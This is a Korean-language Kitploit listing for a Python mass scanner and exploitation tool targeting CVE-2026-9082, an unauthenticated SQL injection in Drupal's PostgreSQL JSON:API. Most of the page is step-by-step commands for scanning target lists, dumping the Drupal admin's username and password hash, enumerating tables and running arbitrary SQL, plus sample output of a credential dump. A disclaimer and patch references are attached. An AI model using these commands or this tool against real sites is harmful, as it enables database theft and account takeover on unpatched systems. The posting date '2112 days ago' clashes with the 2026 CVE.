Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
drupal-jsonapi-sqli-scanner — 스캐너: CVE-2026-9082 Drupal PostgreSQL JSON:API를 통한 SQLi — 인증되지 않은 SQLi로 RCE를 초래하는 Python 스캐너 (CISA KEV) | Kitploit
도구/GitHubGitHub/ridhinva/drupal-jsonapi-sqli-scanner
Vulnerability ScannersExploitationWeb Application ExploitationData ExfiltrationInformation GatheringPenetration TestingRed TeamingDatabase Security

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
GitHub
ridhinva/drupal-jsonapi-sqli-scanner

drupal-jsonapi-sqli-scanner

스캐너: CVE-2026-9082 Drupal PostgreSQL JSON:API를 통한 SQLi — 인증되지 않은 SQLi로 RCE를 초래하는 Python 스캐너 (CISA KEV)

저장소 보기
2112일 전아직 검토되지 않음

CVE-2026-9082 Critical CISA KEV Affected Versions License

CVE-2026-9082 — Drupal PostgreSQL SQL 인젝션

대량 스캐너 & 익스플로잇 도구

Drupal 코어(PostgreSQL)의 인증이 필요 없는 SQL 인젝션
PDO 플레이스홀더 이름 악용을 통한 JSON:API 필터 배열 키 주입


개요

CVE-2026-9082는 Drupal 코어에서 Drupal 8.0~11.3.9을 실행하는 모든 PostgreSQL 기반 사이트에 영향을 미치는 매우 치명적인(Highly Critical) SQL 인젝션 취약점입니다. 2026-05-22에 CISA 알려진 악용 취약점(KEV) 카탈로그에 추가되었으며 — 실제 환경에서 활발히 악용되고 있습니다.

영향

심각도CVSS인증 필요공격 경로
Critical9.8+없음HTTP (JSON:API)
  • 데이터 유출 — 데이터베이스, 사용자, 비밀번호 해시 추출
  • 권한 상승 — 관리자 계정 생성, 콘텐츠 수정
  • 원격 코드 실행 — 일부 구성에서는 pg_exec() 또는 COPY ... PROGRAM을 통해

영향받는 버전

상태버전
❌ 취약Drupal 8.0.0 → 11.3.9 (PostgreSQL 백엔드)
✅ 패치됨11.3.10, 11.2.12, 10.6.9, 10.5.10

작동 원리

이 결함은 core/modules/pgsql/src/EntityQuery/Condition.php에 존재합니다. translateCondition() 메서드는 JSON:API 필터 매개변수의 사용자 제어 배열 키를 사용하여 PDO 플레이스홀더 이름을 구성합니다. PDO는 [a-zA-Z0-9_]만 플레이스홀더 이름으로 파싱하므로, ) 뒤의 모든 접미사는 쿼리에 주입되는 리터럴 SQL이 됩니다.

root@kitploit:~
JSON:API Filter → array key with SQL → PDO placeholder truncation → SQL injection

기능

  • ✅ 대량 스캐너 — 수백 개의 대상을 동시에 스캔
  • ✅ 단일 대상 모드 — 개별 Drupal 사이트 점검
  • ✅ 시간 기반 탐지 — pg_sleep() 블라인드 SQLi 확인
  • ✅ 부울 기반 탐지 — 행 수 비교
  • ✅ 버전 추출 — PostgreSQL 버전 식별
  • ✅ 데이터베이스 정보 — 현재 사용자 및 데이터베이스 이름 추출
  • ✅ 관리자 자격 증명 덤프 — 사용자 이름, 이메일, 비밀번호 해시 (uid=1)
  • ✅ 테이블 목록 — 모든 공개 테이블 열거
  • ✅ 사용자 정의 SQL 쿼리 — 모든 추출 쿼리 실행
  • ✅ 프록시 지원 — Burp Suite 또는 유사 도구를 통한 라우팅
  • ✅ 파일 출력 — 대량 스캔 결과 저장
  • ✅ 컬러 터미널 출력 — 결과를 쉽게 읽을 수 있음

설치

전제 조건

  • Python 3.8+
  • pip (Python 패키지 관리자)

의존성 설치

root@kitploit:~
# Clone the repo
git clone https://github.com/ridhinva/CVE-2026-9082.git
cd CVE-2026-9082

# Install requirements
pip install requests

이것으로 끝입니다! 의존성은 단 하나 — requests입니다.


사용법

🕵️ 단일 대상 점검

root@kitploit:~
python3 cve_2026_9082_scanner.py -u https://target.com --check

📡 다중 대상 대량 스캔

root@kitploit:~
python3 cve_2026_9082_scanner.py -f targets.txt

targets.txt 형식:

root@kitploit:~
https://target1.com
target2.com
192.168.1.100

🔓 PostgreSQL 버전 추출

root@kitploit:~
python3 cve_2026_9082_scanner.py -u https://target.com --version

🗄️ 데이터베이스 정보 추출

root@kitploit:~
python3 cve_2026_9082_scanner.py -u https://target.com --dbinfo

👤 관리자 자격 증명 덤프 (uid=1)

root@kitploit:~
python3 cve_2026_9082_scanner.py -u https://target.com --admin

📋 모든 테이블 나열

root@kitploit:~
python3 cve_2026_9082_scanner.py -u https://target.com --tables

💉 사용자 정의 SQL 쿼리

root@kitploit:~
python3 cve_2026_9082_scanner.py -u https://target.com --query "SELECT usename FROM pg_catalog.pg_user"

결과를 파일로 저장

root@kitploit:~
python3 cve_2026_9082_scanner.py -f targets.txt -o results.txt

프록시 사용 (Burp Suite)

root@kitploit:~
python3 cve_2026_9082_scanner.py -u https://target.com --check --proxy http://127.0.0.1:8080

타이밍 사용자 지정

root@kitploit:~
# Increase sleep time for time-based detection (default: 5s)
python3 cve_2026_9082_scanner.py -u https://target.com --check --delay 10

# Increase HTTP timeout for slow targets (default: 30s)
python3 cve_2026_9082_scanner.py -u https://target.com --check --timeout 60

명령어 참조


출력 예시

취약한 대상

root@kitploit:~
╔══════════════════════════════════════════════════════════════╗
║          CVE-2026-9082 - Drupal PostgreSQL SQLi             ║
║       Mass Scanner + Exploitation Tool v1.0.0               ║
╚══════════════════════════════════════════════════════════════╝
  CISA KEV: Added 2026-05-22  |  Advisory: SA-CORE-2026-004

[*] Checking: https://vulnerable-drupal-site.com

[!!] VULNERABLE - https://vulnerable-drupal-site.com
      Method: time-based (+5.2s)
      Resource: node/article

관리자 자격 증명 덤프

root@kitploit:~
[+] username: admin
[+] email: [email protected]
[+] pass_hash: $S$E8gJ8yJ8...hashed_password...

참조


⚠️ 면책 조항

이 도구는 승인된 보안 테스트, 교육 목적 및 윤리적 연구에만 사용해야 합니다.

컴퓨터 시스템에 대한 무단 접근은 불법입니다. 저자는 이 프로그램으로 인한 오용이나 피해에 대해 어떠한 책임도 지지 않습니다.


작성자

Ridhin V A (@ridhinva) — 버그 바운티 헌터 & 보안 연구원

CISA KEV가 실제 환경에서 악용되고 있다고 발표했기 때문에 제작되었습니다. Drupal 사이트를 패치하세요.

도구 다운로드
플래그설명
-u, --url단일 대상 URL
-f, --file대상 목록 파일 (줄당 하나)
-o, --output스캔 결과를 파일로 저장
--check대상이 취약한지 확인
--versionPostgreSQL 버전 추출
--dbinfoDB 사용자 및 데이터베이스 이름 추출
--adminDrupal 관리자 자격 증명 추출 (uid=1)
--tables모든 데이터베이스 테이블 나열
--query사용자 정의 SQL 추출 쿼리
--threads대량 스캔 스레드 수 (기본값: 20)
--timeoutHTTP 요청 시간 초과 (기본값: 30초)
--delay탐지용 pg_sleep 지연 (기본값: 5초)
--no-ssl-verifyTLS 인증서 검증 건너뛰기
--proxyHTTP 프록시 (예: http://127.0.0.1:8080)
출처링크
Drupal 보안 공지SA-CORE-2026-004
CISA KEVCVE-2026-9082
패치 커밋ea9524d9
NVD 항목CVE-2026-9082
발견자Michael Maturi